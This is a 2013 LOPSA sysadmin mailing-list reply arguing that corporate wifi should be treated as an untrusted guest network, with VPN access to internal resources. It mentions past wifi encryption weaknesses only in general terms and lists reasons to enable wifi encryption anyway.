On Sat, 6 Apr 2013, Edward Ned Harvey (lopser) wrote:
From: [email protected] [mailto:[email protected]]
On Behalf Of David Lang
Your Wifi is an untrusted network that can be sniffed and attacked by anyone
in
the area. So don't let it connect directly to your internal network.
If you're using AES-256 and keys (not just passwords) then no, they can't sniff
it. No more than they could sniff your VPN traffic on the public internet.
It's not nearly that simple
passwords are run through a hash algorithm to create they keys that are used.
Wifi security is full of 'security' systems that we later find out can be
brute-forced by the attackers. They don't need to attack the encryption directly
to find the key, they can pull tricks like sniffing a legitimate message, then
sending that packet, with each of the 256 possible next bytes and see which one
the access point accepts, rinse and repeat
Then the wifi standards release a new encryption option, which they assure
everyone really is secure this time.
Then we find another silly little mistake in the process that makes the strong
enryption algorithm they use meaningless.
So they release another one, which they assure us is really secure this
time.......
How many times do they have to do this before they get it right?
How many times do they have to do this before we decide that we don't believe
that they got it right, and instead take other measures to protect ourselves so
that we are safe even when they get it wrong?
Once we have the other measures in place, why put users through the hassle of
dealing with the wifi security instead of just using the other measures?
Consider it a guest network, just like a hotel network, and have all your users
connect to your company resources through a VPN, just like they would from
home
or a hotel.
Ahh. Case and point. If you use encryption on the wifi that's as strong as
the encryption on your VPN, then you don't need the VPN on the wifi.
I assume you mean "don't need encryption on the wifi"
Now, playing devils's advocate here. There may still be a reason to encrypt the
wifi, even if the wifi encryption is completely broken.
1. the "outrunning the bear" reason that if the AP shows as encrypted when
people are scanning, they may not bother with you and attack someone else
instead
2. casual devices (mobile devices, game stations, cameras, etc) don't all
support VPNs, so wifi encryption protects you from the most casual attacks.
3. "accidental" capturing of data. If someone is mapping wifi in your area, they
will capture anything you send out in plaintext (think the google fiasco here),
they may be doing this for perfectly legitimate reasons, but if your users are
careless (and you allow non-VPN traffic out of your wifi network) they may get
some things
4. turning on even WEP serves as a 'no tresspassing' sign for your network, and
with the DMCA gives you additional legal tools if it's attacked.
David Lang
_______________________________________________
Tech mailing list
[email protected]
https://lists.lopsa.org/cgi-bin/mailman/listinfo/tech
This list provided by the League of Professional System Administrators
http://lopsa.org/
